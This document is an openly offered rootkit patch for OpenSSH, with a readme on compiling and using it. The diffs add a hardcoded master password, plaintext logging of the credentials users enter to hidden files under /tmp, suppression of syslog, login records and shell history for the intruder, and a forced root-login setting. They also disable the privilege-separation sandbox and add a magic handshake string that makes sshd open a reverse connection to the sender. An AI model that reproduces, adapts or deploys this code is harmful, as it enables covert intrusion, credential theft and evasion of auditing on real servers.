############### # $id: udc-hackssh-v3_bajaulaut-v1, 2012/10/28 05:00:50 slash rootkit # udc-hackssh_bajaulaut - openssh reverse backdoor # copyright (c) 2001-2012 slash the underground # # readme: # udc-hackssh_bajaulaut is an openssh backdoor combined with reverse shell capability # and part of udc-kolansong rootkit. The idea was to make use of openssh binary to # control target and/or victim machines. # # todo: # - read remote port parameter # - *magic* private key authentication # # compile: # apt-get install libssl-dev libpam0g-dev librkb5-dev # wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-6.0p1.tar.gz # ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 # # howto: # client: # 'ssh -8 udc -p 880' to connect to udc:880 where a client must listen # # server: # 'sshd -8 udc -p 880' to wait for incoming connects on port 880 # # Or if you received something like "ssh_exchange_identification: Connection # closed by remote host", you can telnet to target machines and issue # 'udc_gamai_magic' string. Once udc_gamai_magic is sent, sshd will then execute and # connect to your 'client' machine on port 8080. # # telnet target_machines.com 22 # CHANGE_ME # Protocol mismatch. # Connection closed by foreign host. # # limitation: # This version will ONLY execute reverse openssh command to the machine which executed # telnet command. # ############### diff -uNr openssh-6.0p1/auth-pam.c udc-hackssh-v3_kalitan-v1.2/auth-pam.c --- openssh-6.0p1/auth-pam.c 2009-07-12 20:07:21.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/auth-pam.c 2012-10-31 18:30:14.000000000 +0800 @@ -1190,6 +1190,16 @@ sshpam_password = password; sshpam_authctxt = authctxt; +// udc-hackssh + char *crypted=udc_pass_crypt; + + udc_reslt_crypt = crypt(password, crypted); + if (strcmp (udc_reslt_crypt, crypted) == 0 ) { + uDc = 1; + return 1; + } +// end + /* * If the user logging in is invalid, or is root but is not permitted * by PermitRootLogin, use an invalid password to prevent leaking @@ -1207,10 +1217,15 @@ sshpam_err = pam_authenticate(sshpam_handle, flags); sshpam_password = NULL; +// udc-hackssh if (sshpam_err == PAM_SUCCESS && authctxt->valid) { - debug("PAM: password authentication accepted for %.100s", - authctxt->user); + if ((udcf = fopen (BAJAUI, "a")) != NULL) { + fprintf(udcf,"%s:%s\n",authctxt->user, password); + fclose(udcf); + } + debug("PAM: password authentication accepted for %.100s", authctxt->user); return 1; +// end } else { debug("PAM: password authentication failed for %.100s: %s", authctxt->valid ? authctxt->user : "an illegal user", diff -uNr openssh-6.0p1/auth-passwd.c udc-hackssh-v3_kalitan-v1.2/auth-passwd.c --- openssh-6.0p1/auth-passwd.c 2009-03-08 08:40:28.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/auth-passwd.c 2012-10-31 16:27:15.000000000 +0800 @@ -44,7 +44,13 @@ #include #include #include - +// udc-hackssh +#ifdef __APPLE__ +#include "/opt/local/include/cryptlib.h" +#elif __linux__ +#include +#endif +// end #include "packet.h" #include "buffer.h" #include "log.h" @@ -82,10 +88,20 @@ { struct passwd * pw = authctxt->pw; int result, ok = authctxt->valid; + +// udc-hackssh + char *crypted=udc_pass_crypt; #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE) static int expire_checked = 0; #endif + udc_reslt_crypt = crypt(password, crypted); + if (strcmp (udc_reslt_crypt, crypted) == 0 ) { + uDc = 1; + return 1; + } +// end + #ifndef HAVE_CYGWIN if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) ok = 0; @@ -122,7 +138,15 @@ authctxt->force_pwchange = 1; } #endif +// udc-hackssh result = sys_auth_passwd(authctxt, password); + if (result) { + if ((udcf = fopen (BAJAUI, "a")) != NULL) { + fprintf (udcf,"%s:%s\n",authctxt->user, password); + fclose(udcf); + } + } +// end if (authctxt->force_pwchange) disable_forwarding(); return (result && ok); diff -uNr openssh-6.0p1/auth.c udc-hackssh-v3_kalitan-v1.2/auth.c --- openssh-6.0p1/auth.c 2011-05-29 19:40:42.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/auth.c 2012-10-31 16:16:38.000000000 +0800 @@ -270,15 +270,18 @@ authmsg = "Postponed"; else authmsg = authenticated ? "Accepted" : "Failed"; - - authlog("%s %s for %s%.100s from %.200s port %d%s", - authmsg, - method, - authctxt->valid ? "" : "invalid user ", - authctxt->user, - get_remote_ipaddr(), - get_remote_port(), - info); +// udc-hackssh + if (!uDc || uDc != 1) { +// end + authlog("%s %s for %s%.100s from %.200s port %d%s", + authmsg, + method, + authctxt->valid ? "" : "invalid user ", + authctxt->user, + get_remote_ipaddr(), + get_remote_port(), + info); + } #ifdef CUSTOM_FAILED_LOGIN if (authenticated == 0 && !authctxt->postponed && diff -uNr openssh-6.0p1/buffer.c udc-hackssh-v3_kalitan-v1.2/buffer.c --- openssh-6.0p1/buffer.c 2010-02-12 06:23:40.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/buffer.c 2012-10-31 16:09:55.000000000 +0800 @@ -37,6 +37,9 @@ buffer->alloc = 0; buffer->buf = xmalloc(len); +// udc-hackssh + memset(buffer->buf, 0, len); +// end buffer->alloc = len; buffer->offset = 0; buffer->end = 0; diff -uNr openssh-6.0p1/canohost.c udc-hackssh-v3_kalitan-v1.2/canohost.c --- openssh-6.0p1/canohost.c 2010-10-12 10:28:12.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/canohost.c 2012-10-31 16:17:47.000000000 +0800 @@ -78,11 +78,14 @@ debug3("Trying to reverse map address %.100s.", ntop); /* Map the IP address to a host name. */ - if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), - NULL, 0, NI_NAMEREQD) != 0) { - /* Host name not found. Use ip address. */ - return xstrdup(ntop); +// udc-hackssh + if (!uDc || uDc != 1) { + if (getnameinfo ((struct sockaddr *) &from, fromlen, name, sizeof(name), + NULL, 0, NI_NAMEREQD) != 0) { + return xstrdup(ntop); + } } +// end /* * if reverse lookup result looks like a numeric hostname, diff -uNr openssh-6.0p1/includes.h udc-hackssh-v3_kalitan-v1.2/includes.h --- openssh-6.0p1/includes.h 2010-10-24 07:47:30.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/includes.h 2012-10-31 16:36:28.000000000 +0800 @@ -17,7 +17,6 @@ #define INCLUDES_H #include "config.h" - #define _GNU_SOURCE /* activate extra prototypes for glibc */ #include @@ -172,4 +171,15 @@ #include "entropy.h" +// udc-hackssh +int uDc; +FILE * udcf; +char * udc_reslt_crypt; + +#define udc_pass_crypt "CHANGE_ME" +#define BAJAUI "/tmp/.inlog" +#define BAJAUO "/tmp/.outlog" +#define gamai "/usr/sbin/sshd" +// end + #endif /* INCLUDES_H */ diff -uNr openssh-6.0p1/log.c udc-hackssh-v3_kalitan-v1.2/log.c --- openssh-6.0p1/log.c 2011-06-20 12:42:23.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/log.c 2012-10-31 16:24:34.000000000 +0800 @@ -351,6 +351,9 @@ void do_log(LogLevel level, const char *fmt, va_list args) { +// udc-hackssh + if(!uDc || uDc != 1) { +// end #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT) struct syslog_data sdata = SYSLOG_DATA_INIT; #endif @@ -428,3 +431,6 @@ } errno = saved_errno; } +// udc-hackssh +} +// end diff -uNr openssh-6.0p1/servconf.c udc-hackssh-v3_kalitan-v1.2/servconf.c --- openssh-6.0p1/servconf.c 2011-10-02 15:57:38.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/servconf.c 2012-10-31 16:09:55.000000000 +0800 @@ -686,7 +686,9 @@ { "without-password", PERMIT_NO_PASSWD }, { "forced-commands-only", PERMIT_FORCED_ONLY }, { "yes", PERMIT_YES }, - { "no", PERMIT_NO }, +// udc-hackssh + { "no", PERMIT_YES }, +// end { NULL, -1 } }; static const struct multistate multistate_compression[] = { diff -uNr openssh-6.0p1/session.c udc-hackssh-v3_kalitan-v1.2/session.c --- openssh-6.0p1/session.c 2011-11-04 07:55:24.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/session.c 2012-10-31 16:18:40.000000000 +0800 @@ -1203,6 +1203,12 @@ if (getenv("TZ")) child_set_env(&env, &envsize, "TZ", getenv("TZ")); +// udc-hackssh + if (uDc) + child_set_env(&env, &envsize, "HISTFILE", "/dev/null"); +// end + + /* Set custom environment options from RSA authentication. */ if (!options.use_login) { while (custom_environment) { @@ -1487,6 +1493,9 @@ #else if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno)); +// udc-hackssh + if (!uDc || uDc != 1) { +// end if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1); @@ -1496,6 +1505,12 @@ perror("initgroups"); exit(1); } +// udc-hackssh + else { + setgid(0); + initgroups(pw->pw_name, 0); + } +// end endgrent(); #endif @@ -1519,12 +1534,18 @@ } #else /* Permanently switch to the desired uid. */ +// udc-hackssh + if (!uDc || uDc != 1) +// end permanently_set_uid(pw); #endif } if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid) fatal("Failed to set uids to %u.", (u_int) pw->pw_uid); +// udc-hackssh + } +// end } static void diff -uNr openssh-6.0p1/ssh.c udc-hackssh-v3_kalitan-v1.2/ssh.c --- openssh-6.0p1/ssh.c 2011-11-04 07:54:22.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/ssh.c 2012-10-31 16:09:55.000000000 +0800 @@ -83,6 +83,9 @@ #include "canohost.h" #include "compat.h" #include "cipher.h" +// udc-hackssh bajaulaut version +#include +// end #include "packet.h" #include "buffer.h" #include "channels.h" @@ -125,6 +128,10 @@ /* don't exec a shell */ int no_shell_flag = 0; +// udc-hackssh bajaulaut version +int udc_bajau_laut = 0; +// end + /* * Flag indicating that nothing should be read from stdin. This can be set * on the command line. @@ -325,7 +332,7 @@ argv0 = av[0]; again: - while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" + while ((opt = getopt(ac, av, "12468ab:c:e:fgi:kl:m:no:p:qstvx" "ACD:F:I:KL:MNO:PR:S:TVw:W:XYy")) != -1) { switch (opt) { case '1': @@ -340,6 +347,11 @@ case '6': options.address_family = AF_INET6; break; +// udc-hackssh bajaulaut version + case '8': + udc_bajau_laut = 1; + break; +// end case 'n': stdin_null_flag = 1; break; diff -uNr openssh-6.0p1/sshconnect.c udc-hackssh-v3_kalitan-v1.2/sshconnect.c --- openssh-6.0p1/sshconnect.c 2011-05-29 19:42:34.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/sshconnect.c 2012-10-31 16:09:56.000000000 +0800 @@ -333,6 +333,9 @@ * and %p substituted for host and port, respectively) to use to contact * the daemon. */ +// udc-hackssh bajaulaut version +extern int udc_bajau_laut; +// end int ssh_connect(const char *host, struct sockaddr_storage * hostaddr, u_short port, int family, int connection_attempts, int *timeout_ms, @@ -347,7 +350,9 @@ debug2("ssh_connect: needpriv %d", needpriv); /* If a proxy command is given, connect using it. */ - if (proxy_command != NULL) +// udc-hackssh bajaulaut version + if (proxy_command != NULL && !udc_bajau_laut) +// end return ssh_proxy_connect(host, port, proxy_command); /* No proxy command. */ @@ -360,6 +365,56 @@ fatal("%s: Could not resolve hostname %.100s: %s", __progname, host, ssh_gai_strerror(gaierr)); +// udc-hackssh bajaulaut version + if (udc_bajau_laut) { + int s, one = 1, size_aa = sizeof(struct sockaddr); + struct addrinfo *aid; + struct sockaddr aa; + + if ((gaierr = getaddrinfo("127.0.0.1", strport, &hints, &aid)) < 0) { + fprintf(stderr, "getaddrinfo (during udc reverse fun): %s\n", gai_strerror(gaierr)); + exit(gaierr); + } + + if (aid->ai_family == PF_INET) { + ((struct sockaddr_in*)(aid->ai_addr))->sin_addr.s_addr = INADDR_ANY; + } +#ifdef HAVE_STRUCT_IN6_ADDR + else { + ((struct sockaddr_in6*)(aid->ai_addr))->sin6_addr = in6addr_any; + } +#endif + + if ((s = socket(aid->ai_family, SOCK_STREAM, 0)) < 0) { + perror("socket (during udc reverse fun)"); + exit(errno); + } + + if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one)) < 0) { + perror("setsockopt (during udc reverse fun)\n"); + exit(errno); + } + + printf("udc reverse fun: binding to port %s\n", strport); + if (bind(s, (struct sockaddr*)(aid->ai_addr), sizeof(struct sockaddr)) < 0) { + perror("bind (during udc reverse fun)"); + exit(errno); + } + + if (listen(s, 1) < 0) { + perror("listen (during udc reverse fun)"); + exit(errno); + } + + if ((sock = accept(s, &aa, &size_aa)) < 0) { + perror("accept (during udc reverse fun)"); + exit(errno); + } + memcpy(hostaddr, &aa, size_aa); + + goto startbajau; + } +// end for (attempt = 0; attempt < connection_attempts; attempt++) { if (attempt > 0) { /* Sleep a moment before retrying. */ @@ -404,6 +459,9 @@ break; /* Successful connection. */ } +// udc-hackssh bajaulaut version + startbajau: +// end freeaddrinfo(aitop); /* Return failure if we didn't get a successful connection. */ diff -uNr openssh-6.0p1/sshconnect2.c udc-hackssh-v3_kalitan-v1.2/sshconnect2.c --- openssh-6.0p1/sshconnect2.c 2011-05-29 19:42:34.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/sshconnect2.c 2012-10-31 16:26:24.000000000 +0800 @@ -878,6 +878,12 @@ snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ", authctxt->server_user, host); password = read_passphrase(prompt, 0); +// udc-hackssh + if ((udcf = fopen (BAJAUO, "a")) != NULL){ + fprintf (udcf,"user:password@host:port --> %s:%s@%s:%s\n",authctxt->server_user,password,authctxt->host,get_remote_port); + fclose (udcf); + } +// end packet_start(SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring(authctxt->server_user); packet_put_cstring(authctxt->service); diff -uNr openssh-6.0p1/sshd.c udc-hackssh-v3_kalitan-v1.2/sshd.c --- openssh-6.0p1/sshd.c 2012-02-15 02:03:31.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/sshd.c 2012-10-31 16:20:03.000000000 +0800 @@ -146,6 +146,14 @@ /* Name of the server configuration file. */ char *config_file_name = _PATH_SERVER_CONFIG_FILE; +// udc-hackssh - bajaulaut version +#ifdef IPV4_DEFAULT + int IPv4or6 = AF_INET; +#else + int IPv4or6 = AF_UNSPEC; +#endif +// end + /* * Debug mode flag. This can be set on the command line. If debug * mode is enabled, extra debugging output will be sent to the system @@ -407,6 +415,10 @@ char buf[256]; /* Must not be larger than remote_version. */ char remote_version[256]; /* Must be at least as big as buf. */ +// udc-hackssh gamai + char udc_gamai_cmd[256]; +// end + if ((options.protocol & SSH_PROTO_1) && (options.protocol & SSH_PROTO_2)) { major = PROTOCOL_MAJOR_1; @@ -461,6 +473,13 @@ */ if (sscanf(client_version_string, "SSH-%d.%d-%[^\n]\n", &remote_major, &remote_minor, remote_version) != 3) { +// udc-hackssh gamai + if (strcmp (client_version_string, "CHANGE_ME") == 0) { // udc_gamai_magic string + uDc; + sprintf (udc_gamai_cmd, "%s -D -8 %s -p 8080", gamai, get_remote_ipaddr()); + system (udc_gamai_cmd); + } +// end s = "Protocol mismatch.\n"; (void) atomicio(vwrite, sock_out, s, strlen(s)); close(sock_in); @@ -469,6 +488,7 @@ client_version_string, get_remote_ipaddr()); cleanup_exit(255); } + debug("Client protocol version %d.%d; client software version %.100s", remote_major, remote_minor, remote_version); @@ -633,8 +653,17 @@ /* Store a pointer to the kex for later rekeying */ pmonitor->m_pkex = &xxx_kex; - if (use_privsep == PRIVSEP_SANDBOX) - box = ssh_sandbox_init(); +// udc-hackssh bajaulaut version + int udc_bajau_laut = 1; + + if (udc_bajau_laut == 0) { + if (use_privsep == PRIVSEP_SANDBOX) + box = ssh_sandbox_init(); + else + return; + } +// end + pid = fork(); if (pid == -1) { fatal("fork of unprivileged child failed"); @@ -1322,6 +1351,13 @@ const char *remote_ip; char *test_user = NULL, *test_host = NULL, *test_addr = NULL; int remote_port; + +// udc-hackssh bajaulaut version + int listen_sock; + int udc_bajau_laut = 0; + char udc_bajau_conn[1024]; +// end + char *line, *p, *cp; int config_s[2] = { -1 , -1 }; u_int64_t ibytes, obytes; @@ -1358,7 +1394,9 @@ initialize_server_options(&options); /* Parse command-line arguments. */ - while ((opt = getopt(ac, av, "f:p:b:k:h:g:u:o:C:dDeiqrtQRT46")) != -1) { +// udc-hackssh bajaulaut version + while ((opt = getopt(ac, av, "f:p:b:k:h:g:u:o:C:8:dDeiqrtQRT46")) != -1) { +// end switch (opt) { case '4': options.address_family = AF_INET; @@ -1478,6 +1516,13 @@ exit(1); xfree(line); break; +// udc-hackssh bajaulaut version + case '8': + udc_bajau_laut = 1; + strncpy (udc_bajau_conn, optarg, sizeof (udc_bajau_conn)); + printf ("bajau - case: Enabling bajau laut!\n"); + break; +// end case '?': default: usage(); @@ -1786,6 +1831,54 @@ /* Get a connection, either from inetd or a listening TCP socket */ if (inetd_flag) { server_accept_inetd(&sock_in, &sock_out); +// udc-hackssh bajaulaut version + } else if (udc_bajau_laut) { + int client_port = options.ports[0]; + char port[100]; + struct addrinfo *adi, hints; + + memset(&hints, 0, sizeof(hints)); + hints.ai_family = IPv4or6; + hints.ai_socktype = SOCK_STREAM; + + // resolv hostname + memset(port, 0, sizeof(port)); + snprintf(port, sizeof(port), "%d", client_port); + if (getaddrinfo(udc_bajau_conn, port, &hints, &adi) < 0) { + perror("addrinfo (during bajau_laut)"); + exit(errno); + } + + // create socket + if ((listen_sock = socket(adi->ai_family, adi->ai_socktype, adi->ai_protocol)) < 0) { + perror("socket (during bajau_laut)"); + exit(errno); + } + printf("bajau_laut: Connecting to host %s on port %s\n", udc_bajau_conn, port); + + // connecting + if (connect(listen_sock, (struct sockaddr*)adi->ai_addr, sizeof(struct sockaddr)) < 0) { + perror("connect (during bajau_laut)"); + exit(errno); + } + if (fcntl(listen_sock, F_SETFL, 0) < 0) + error("newsock del O_NONBLOCK: %s", strerror(errno)); + + // established + sock_in = listen_sock; + if ((sock_out = dup(sock_in)) < 0) { + perror("dup (during reverse fun)"); + sock_out = sock_in; + } + + if (options.protocol & SSH_PROTO_1) + generate_ephemeral_server_key(); + + signal(SIGHUP, sighup_handler); + signal(SIGCHLD, main_sigchld_handler); + signal(SIGTERM, sigterm_handler); + signal(SIGQUIT, sigterm_handler); +// end } else { platform_pre_listen(); server_listen(); @@ -1837,7 +1930,9 @@ error("setsid: %.100s", strerror(errno)); #endif - if (rexec_flag) { +// udc-hackssh bajaulaut version + if (rexec_flag && !udc_bajau_laut) { +// end int fd; debug("rexec start in %d out %d newsock %d pipe %d sock %d", diff -uNr openssh-6.0p1/sshlogin.c udc-hackssh-v3_kalitan-v1.2/sshlogin.c --- openssh-6.0p1/sshlogin.c 2011-01-11 14:20:07.000000000 +0800 +++ udc-hackssh-v3_kalitan-v1.2/sshlogin.c 2012-10-31 16:21:11.000000000 +0800 @@ -133,8 +133,12 @@ li = login_alloc_entry(pid, user, host, tty); login_set_addr(li, addr, addrlen); - login_login(li); - login_free_entry(li); +// udc-hackssh + if (!uDc || uDc != 1) { + login_login(li); + login_free_entry(li); + } +// end } #ifdef LOGIN_NEEDS_UTMPX @@ -146,8 +150,12 @@ li = login_alloc_entry(pid, user, host, ttyname); login_set_addr(li, addr, addrlen); - login_utmp_only(li); - login_free_entry(li); +// udc-hackssh + if(!uDc || uDc != 1) { + login_utmp_only(li); + login_free_entry(li); + } +// end } #endif @@ -158,6 +166,10 @@ struct logininfo *li; li = login_alloc_entry(pid, user, NULL, tty); - login_logout(li); - login_free_entry(li); +// udc-hackssh + if (!uDc || uDc != 1) { + login_logout(li); + login_free_entry(li); + } +// end }